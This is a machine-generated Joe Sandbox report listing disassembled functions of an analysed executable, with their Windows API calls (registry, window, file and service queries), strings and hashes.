Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Text$Color
String ID:
API String ID: 3751486306-0
Opcode ID: e567defc72e246961c8af39d4febd41f199f9d7fdc0c8b8010f19e85b6b18a2c
Instruction ID: b4c65c49d8eb0cd944142d6dd1dfe14a70a906b95c1eb0a7807788c7d7611a8f
Opcode Fuzzy Hash: e567defc72e246961c8af39d4febd41f199f9d7fdc0c8b8010f19e85b6b18a2c
Instruction Fuzzy Hash: 7E413A74644702AFD320DF14DC86F3ABBE4EB84B40F54441DFA549A2C1E7B5E909CB6A

Function 004499C1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004499C6
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00449A76
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00449A90
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00449AAC
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00449AC1

Strings

Software\, xrefs: 00449A10

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseEnumH_prologOpenQueryValue
String ID: Software\
API String ID: 2161548231-964853688
Opcode ID: 78378f755161b4e955fdaabf437b5757bb0f251dd2463943a055ff38064ed011
Instruction ID: d83f4e3d60a7fbe8a7400f5fd4bed7d50b963160fc78545493af05299212715b
Opcode Fuzzy Hash: 78378f755161b4e955fdaabf437b5757bb0f251dd2463943a055ff38064ed011
Instruction Fuzzy Hash: B831897190015AAADF01EBA1DC859EFBB79AF08318F50413BF511B2191DB789E48DB68

Function 0040AAE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 0040AB47
GetSysColor.USER32(00000011), ref: 0040AB66
GetSysColor.USER32(00000007), ref: 0040AB8D
OffsetRect.USER32(?,000000FE,000000FE), ref: 0040ABA2
GetSysColor.USER32(00000011), ref: 0040ABBD

Strings

2, xrefs: 0040AB29

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$Rect$CopyOffset
String ID: 2
API String ID: 886430170-450215437
Opcode ID: 6a5b093cf5e1de6d888414a5dfb2a0c473bcac771957fdfd5012d77e72fafbd4
Instruction ID: 921e8a527247e8ac8add6bea4beb0d9af71f36b150b68d9f884e8816a18b9902
Opcode Fuzzy Hash: 6a5b093cf5e1de6d888414a5dfb2a0c473bcac771957fdfd5012d77e72fafbd4
Instruction Fuzzy Hash: 403153722083409BD310DF54C884A6BB7E9FB88714F540A6DF685972D2C778E915CB6B

Function 0044292A Relevance: 10.6, APIs: 7, Instructions: 97windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044292F

Part of subcall function 004336C7: GetDlgItem.USER32(?,?), ref: 004336D5

SendMessageA.USER32(?,00000184,00000000,00000000), ref: 0044295A
SendMessageA.USER32(?,00000180,00000000,?), ref: 0044299F
SendMessageA.USER32(?,0000019A,00000000,?), ref: 004429B2
SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 004429E8
SendMessageA.USER32(?,00000199,00000000,00000000), ref: 00442A0B
SendMessageA.USER32(?,00000186,00000000,00000000), ref: 00442A1F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$H_prologItem
String ID:
API String ID: 621129232-0
Opcode ID: 0cf8a0766f8cb2d40c42b670743ede35816d53f82eaccfed91da44221efe5db7
Instruction ID: 032a6a171ef4bdc1afa532ad8b2ce4756d025fbb4135ae920fde568f4772243d
Opcode Fuzzy Hash: 0cf8a0766f8cb2d40c42b670743ede35816d53f82eaccfed91da44221efe5db7
Instruction Fuzzy Hash: EF319070B00219AFEB14DF54DD81FAEBB71BF04714F60822AF211AA2E1DBB4AD45CB54

Function 0040F7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryA.ADVAPI32(00000000,80000006,?), ref: 0040F7EB
RegOpenKeyExA.ADVAPI32(?,PerfStats\StopStat,00000000,00020019,?,000000FF,?,?), ref: 0040F819
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?), ref: 0040F83E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?), ref: 0040F868
RegCloseKey.ADVAPI32(?,?,?), ref: 0040F886

Strings

PerfStats\StopStat, xrefs: 0040F813

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: QueryValue$CloseConnectOpenRegistry
String ID: PerfStats\StopStat
API String ID: 2742735331-2071984185
Opcode ID: 04586fc72e7291dd90aa25af952ffc74b17a182bea3d68bb21027b1bba78068d
Instruction ID: 00bce97aeaa27c763b9404c808a3057be9a9a0f7a9cf9602248c8b4cd812f045
Opcode Fuzzy Hash: 04586fc72e7291dd90aa25af952ffc74b17a182bea3d68bb21027b1bba78068d
Instruction Fuzzy Hash: 6721B1B26002116BD724EF69DC84D7BB3ADEBC8744B80493DF905D7251E634ED0A87A6

Function 00450E55 Relevance: 10.6, APIs: 7, Instructions: 90COMMON

Download Yara Rule

APIs

GetViewportExtEx.GDI32(?,?,?,?,?,004507C1,00000001), ref: 00450E6C
GetWindowExtEx.GDI32(?,?,?,?,?,004507C1,00000001), ref: 00450E79
GetDeviceCaps.GDI32(?,00000058), ref: 00450EE4
GetDeviceCaps.GDI32(?,0000005A), ref: 00450F01
SetMapMode.GDI32(00000000,00000008), ref: 00450F27
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00450F38
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00450F49

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 3a3f7fe53f79d4505885527cba2f72b89f3daef66c0e8b814f725d3e2448216a
Instruction ID: dbfa5eb0759082eee3f62a917f78dd3e25272e053dec4109d0209145fa058e56
Opcode Fuzzy Hash: 3a3f7fe53f79d4505885527cba2f72b89f3daef66c0e8b814f725d3e2448216a
Instruction Fuzzy Hash: 58318D36200B00AFDB315B65DE41B2B7BF2FF44702B64882EE64791A62C775B854DF08

Function 00419439 Relevance: 10.6, APIs: 7, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000002), ref: 00419454
GetParent.USER32(?), ref: 00419467

Part of subcall function 004193E0: GetWindowLongA.USER32(?,000000F0), ref: 004193F8
Part of subcall function 004193E0: GetParent.USER32(?), ref: 00419411
Part of subcall function 004193E0: GetWindowLongA.USER32(?,000000EC), ref: 00419424

GetWindow.USER32(?,00000002), ref: 0041948A
GetWindow.USER32(?,00000002), ref: 0041949C
GetWindowLongA.USER32(?,000000EC), ref: 004194AC
IsWindowVisible.USER32(?), ref: 004194C5
GetTopWindow.USER32(?), ref: 004194EB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Long$Parent$Visible
String ID:
API String ID: 3473418232-0
Opcode ID: bb9bbf7298f72bc953d42a7ad66cd131a600142eb05fd4f027c53d9a3b8d00a0
Instruction ID: 2a5b956addaa0cb36ff0be71e96440765e3bc9f7907ccb194fedf41357c8069a
Opcode Fuzzy Hash: bb9bbf7298f72bc953d42a7ad66cd131a600142eb05fd4f027c53d9a3b8d00a0
Instruction Fuzzy Hash: 9621B3326047157FDB317E659C29FAF729DAF84754F08462AF901E7252C62CDC42C7A8

Function 004365F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85stringtimeCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,004365E0,?), ref: 00436620
GetFileTime.KERNEL32(00000000,eC,?,?,?,?,?,?,?,?,?,004365E0,?), ref: 00436641
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004365E0,?), ref: 00436650
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004365E0,?), ref: 00436671

Strings

eC, xrefs: 004365FE, 00436683, 00436694, 004366A6, 0043660B
eC, xrefs: 0043663C, 0043667E, 0043663F, 00436682

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID: eC$eC
API String ID: 1499663573-3171253153
Opcode ID: f6cd93865531e1874592e2017178017721e28629ebeee91f83e854692d53a20b
Instruction ID: f3a991bd1953317f28dbcbe4eb27a5693d1aa006151a8ae58b1e52100a89e302
Opcode Fuzzy Hash: f6cd93865531e1874592e2017178017721e28629ebeee91f83e854692d53a20b
Instruction Fuzzy Hash: F331A072500606BFD710DF65C886EABB7F8BB18350F10892EE556C7291E7B4E984CB94

Function 004359BD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 004359C8

Part of subcall function 0044C0D1: lstrlenA.KERNEL32(00000104,00000000,?,0044C015), ref: 0044C108

lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 00435A49
lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 00435A52
lstrcatA.KERNEL32(?,\...), ref: 00435A81
lstrcatA.KERNEL32(?,?), ref: 00435A85

Strings

\..., xrefs: 00435A7B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: lstrlen$lstrcat$lstrcpy
String ID: \...
API String ID: 2778582283-1167917071
Opcode ID: 1fff129315833e4d1a35df8c1c2ab56e6877296587a0c39f41ce6ceae9c4dc61
Instruction ID: 11a7a69b26d757feb64747643274a2959e031229ba0ba9a35ad3c357a5c4013d
Opcode Fuzzy Hash: 1fff129315833e4d1a35df8c1c2ab56e6877296587a0c39f41ce6ceae9c4dc61
Instruction Fuzzy Hash: 60214C31900B48EFDB20AB60DCC0F7B7BE89B08356F04522FE90596141E37CDD409B59

Function 0040E020 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101D,00000000,00000000), ref: 0040E059
SendMessageA.USER32(?,0000101D,00000001,00000000), ref: 0040E06A
SendMessageA.USER32(?,0000101D,00000002,00000000), ref: 0040E07B
SendMessageA.USER32(?,0000101D,00000003,00000000), ref: 0040E08E

Part of subcall function 0042F2C1: lstrlenA.KERNEL32(?,?,00000000,?,0040127F,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 0042F2EB

Part of subcall function 0040E380: RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E3E9
Part of subcall function 0040E380: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,00000001,?,?,00000000,?,753D4A40), ref: 0040E462
Part of subcall function 0040E380: RegCloseKey.ADVAPI32(?), ref: 0040E479

Strings

Settings\Window\, xrefs: 0040E0E8
%d,%d,%d,%d, xrefs: 0040E09C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$CloseCreateValuelstrlen
String ID: %d,%d,%d,%d$Settings\Window\
API String ID: 1956160522-4254346116
Opcode ID: f4df0ba5ed9feeeac000da502e0f50e2c89a41c1e00ffed2c2b60136304e557a
Instruction ID: f198e6b2ccf21bd4e2e9ed21465bc2e18785a7b1bdaf2b4ff38409dcbceb7216
Opcode Fuzzy Hash: f4df0ba5ed9feeeac000da502e0f50e2c89a41c1e00ffed2c2b60136304e557a
Instruction Fuzzy Hash: 1E21C771344340BBD230DB59DC42F5BB7E8AF89B10F104A1EF584A72C1D7B964044B66

Function 004066C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(0000002C), ref: 004066CF
GetSubMenu.USER32(0000002C,00000000), ref: 004066EE
GetMenuItemID.USER32(0000002C,00000000), ref: 00406718
GetMenuItemInfoA.USER32(0000002C,00000000,00000001,?), ref: 0040674B

Strings

,, xrefs: 00406736
, xrefs: 00406743

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$Item$CountInfo
String ID: $,
API String ID: 3929006210-71045815
Opcode ID: fdc8aaa665ade6059c37cd4c59b5778546ab839742a9abd48b005d86e724087d
Instruction ID: 5e3c25e14cc1f98ca1ed5764ba6a61a440e12b8b97cbbc3b8703490ce7c74308
Opcode Fuzzy Hash: fdc8aaa665ade6059c37cd4c59b5778546ab839742a9abd48b005d86e724087d
Instruction Fuzzy Hash: 5E11F0762043009BDB10AE25CC88E2BBBE8EBC8314F41092AF906D7281DB3AD8148B61

Function 00441FFF Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0044201C
GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0044202A
DispatchMessageA.USER32(?), ref: 0044203D
SetRectEmpty.USER32(?), ref: 00442066
GetDesktopWindow.USER32 ref: 0044207E
LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 0044208F
GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 004420A6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 99c0c9f9c3ec4aa4f5a8104193801d595f480bf1b7146d35fa49e27f17fa29f7
Instruction ID: 96deafe015ff58ee3d287a78a8603dbef3f3f627448cd47a955333c3c495f8ef
Opcode Fuzzy Hash: 99c0c9f9c3ec4aa4f5a8104193801d595f480bf1b7146d35fa49e27f17fa29f7
Instruction Fuzzy Hash: 652162B1500B09AFD7209F65DD84E67BBECFB08355B80082EF646C7251D735E805CB68

Function 00432406 Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00432413
GetWindowRect.USER32(?,?), ref: 0043242D
ScreenToClient.USER32(?,?), ref: 00432440
ScreenToClient.USER32(?,?), ref: 00432449
EqualRect.USER32(?,?), ref: 00432453
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0043247B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00432493

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 525f517cc44860449e1a01f3f96c3ad9b2dd51895609f2231be251aa52889e90
Instruction ID: 2d7f2e92f09ef9a277198b43286403c4228d469295bc51a2ab8c67d71cd47f08
Opcode Fuzzy Hash: 525f517cc44860449e1a01f3f96c3ad9b2dd51895609f2231be251aa52889e90
Instruction Fuzzy Hash: AE11BEB650060ABFE710CF69DC48EBBBBBDEB88311F10852AB91593215E770EC00CB64

Function 00429D20 Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 00429D30
GetWindowLongA.USER32(?,000000F0), ref: 00429D39
InflateRect.USER32(?,00000001,00000001), ref: 00429D98
GetParent.USER32(?), ref: 00429D9F
ScreenToClient.USER32(00000000,?), ref: 00429DB3
ScreenToClient.USER32(00000000,?), ref: 00429DBB
InvalidateRect.USER32(00000000,?,00000000), ref: 00429DD1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
String ID:
API String ID: 1809568455-0
Opcode ID: 1019781de0960a69ed5bde6eb7946e25de61548d3b059f462d4a1c698e1c794f
Instruction ID: f736f444a9291bb14c5ee687d0d1d6cfc86cfdf66e75555e5f9d57f4d87d09af
Opcode Fuzzy Hash: 1019781de0960a69ed5bde6eb7946e25de61548d3b059f462d4a1c698e1c794f
Instruction Fuzzy Hash: AC218B32214315AFD310EB18E8A4FBB73A9EB80721F84052EF54583292D738DC45D766

Function 00449C5A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00449C88
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00449CAB
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00449CCA
RegCloseKey.ADVAPI32(?), ref: 00449CDA
RegCloseKey.ADVAPI32(?), ref: 00449CE4

Strings

software, xrefs: 00449C72

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 364e421d7cf7ccdf1c188feaf7c6726fb544e621f4e4334927076a1a698e5c5e
Instruction ID: 2d0762219329a6c5d097d386a8b100f610379d918853ee767c38c314c73d4b29
Opcode Fuzzy Hash: 364e421d7cf7ccdf1c188feaf7c6726fb544e621f4e4334927076a1a698e5c5e
Instruction Fuzzy Hash: ED11B672900159FBDF21DB96DD84DEFFFBCEF85705F1040AAA504A2122D6719E01EBA4

Function 00410470 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63serviceCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 004104D8
OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004104F7
OpenServiceA.ADVAPI32(00000000,RasMan,00000004), ref: 0041050E
CloseServiceHandle.ADVAPI32(00000000), ref: 00410523

Strings

RasMan, xrefs: 00410508
kE, xrefs: 00410496

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

